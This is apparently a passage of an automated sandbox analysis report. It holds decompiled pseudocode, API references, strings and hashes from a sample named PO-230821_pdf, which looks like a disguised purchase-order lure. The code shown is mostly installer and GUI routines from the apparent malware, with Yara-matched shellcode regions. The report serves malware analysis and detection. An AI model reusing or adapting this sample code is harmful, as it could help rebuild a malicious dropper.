Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E

Strings

Fosklcks, xrefs: 00404C16, 00404C1B, 00404C26
H7B, xrefs: 00404BB2
A, xrefs: 00404BD8
C:\Users\user\AppData\Local\Temp, xrefs: 00404C05

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Fosklcks$H7B
API String ID: 2624150263-1450996773
Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Alvin\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 542301482-1909526481
Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1000270A Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000270A(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x1000270f
0x1000271f

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,10003783,?,?,?,00000000), ref: 1000270F
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 10002718

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 70be9028bfe8f31cc5e4db828731ddaff9b24b4b814339d392eb8a92420bd9c1
Instruction ID: 0ae05739294a5017281d9f0176e65085105542092b9dd47992e5a2b5b9d3324e
Opcode Fuzzy Hash: 70be9028bfe8f31cc5e4db828731ddaff9b24b4b814339d392eb8a92420bd9c1
Instruction Fuzzy Hash: 66B09231044318BFEE842B91DC49B883F28FB046A2F004020F64D48064CBB256588B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29

Uniqueness

Uniqueness Score: -1.00%

Function 10001E8C Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001E8C() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x1000bf00 = _t3;
				return 0 | _t3 != 0x00000000;
			}

0x10001e8c
0x10001e99
0x10001ea0

APIs

GetProcessHeap.KERNEL32(10001365,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?,00000001,?), ref: 10001E8C

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d99d0f3babccd101b0e6f39778d23551cd0dfc21a296d886a3547414dd714436
Instruction ID: 215dc24fbe99a76f31b03c3578fa2aba8265b2717fe9d478c089e04f2bdfcf36
Opcode Fuzzy Hash: d99d0f3babccd101b0e6f39778d23551cd0dfc21a296d886a3547414dd714436
Instruction Fuzzy Hash: 70B012B03019174BE78C4F388C9431E35D47708141300803DF503C2D79EF2084109F04

Uniqueness

Uniqueness Score: -1.00%

Function 02450A3B Relevance: .3, Instructions: 270COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 02450DB9

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 52eb61103d680095326321134e4d4dc95cfaf0269680ba057166f659d5d11696
Instruction ID: 286ab9ddf51b1581ce795ad764154499c66c67f8d988739b5ab9667d772c4fdd
Opcode Fuzzy Hash: 52eb61103d680095326321134e4d4dc95cfaf0269680ba057166f659d5d11696
Instruction Fuzzy Hash: 44D10154C5D2EDADCF06CBE984647FCBFB05D2A102F4845CAE4E1A6243C13A938EDB25

Uniqueness

Uniqueness Score: -1.00%

Function 0245017B Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
Instruction ID: 11127a6b4ca275939c21f5b137a756c110c20cbc1af59fe7303feaa7ad6d9307
Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
Instruction Fuzzy Hash: 3211C23A600129AFC721DF69C8809AEB7E9EF187A47049016FC94CB311E335ED81CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0245013E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
Instruction ID: 9ad9c74640eadf75f16be42916e1cc71681e646628c518384f2b1673048178af
Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
Instruction Fuzzy Hash: 00E09A39264148EFCB00CBA8CD80E25B3F8EB0C320B040291FC25C73A1E634EE00DA90

Uniqueness

Uniqueness Score: -1.00%

Function 02450109 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
Instruction ID: 373de72d7c84de8a3a1bd85239e12dcd5fbeaf21b3a4ee4ea331c3712da14696
Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
Instruction Fuzzy Hash: 00E04F3A2106249BC7629B5AC940E97F7E9EB8C7B0B495426EDC997612C731FC01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0245005F Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00405038
0x00405051
0x00405056
0x0040505e
0x00405064
0x0040507a
0x0040507d
0x004052a8
0x004052af
0x004052c3
0x004052b1
0x004052b3
0x004052b6
0x004052b7
0x004052be
0x004052be
0x004052cf
0x004052dd
0x004052e0
0x004052f6
0x0040536b
0x0040536e
0x00405370
0x0040537a
0x00405388
0x00405388
0x0040538a
0x00405394
0x0040539a
0x0040539d
0x004053a0
0x004053bb
0x004053a2
0x004053ac
0x004053ac
0x004053a0
0x00405394
0x00000000
0x0040536e
0x004052fb
0x00405306
0x0040530b
0x00405312
0x00405317
0x0040531b
0x00405326
0x00405326
0x0040532a
0x0040532e
0x00405332
0x00405345
0x00405334
0x00405334
0x0040533b
0x00405341
0x0040533d
0x0040533d
0x0040533d
0x0040533b
0x00405349
0x0040534b
0x0040535e
0x00405361
0x00405364
0x00405364
0x0040532e
0x00000000
0x0040531b
0x004052fd
0x00405304
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053be
0x004053be
0x004053c5
0x00405436
0x0040543e
0x00405446
0x00405446
0x0040544f
0x00405451
0x00405458
0x0040545b
0x0040545b
0x00405461
0x00405468
0x0040546b
0x0040546b
0x00405471
0x00405477
0x0040547d
0x0040547d
0x0040548a
0x004055eb
0x004055f2
0x0040560f
0x00405615
0x00405627
0x00405627
0x00000000
0x00405490
0x00405492
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a3
0x004054a4
0x004054a5
0x004054a7
0x004054a7
0x004054af
0x004054f0
0x004054f2
0x00405502
0x00405505
0x0040550a
0x00405511
0x00405514
0x004055b6
0x004055bf
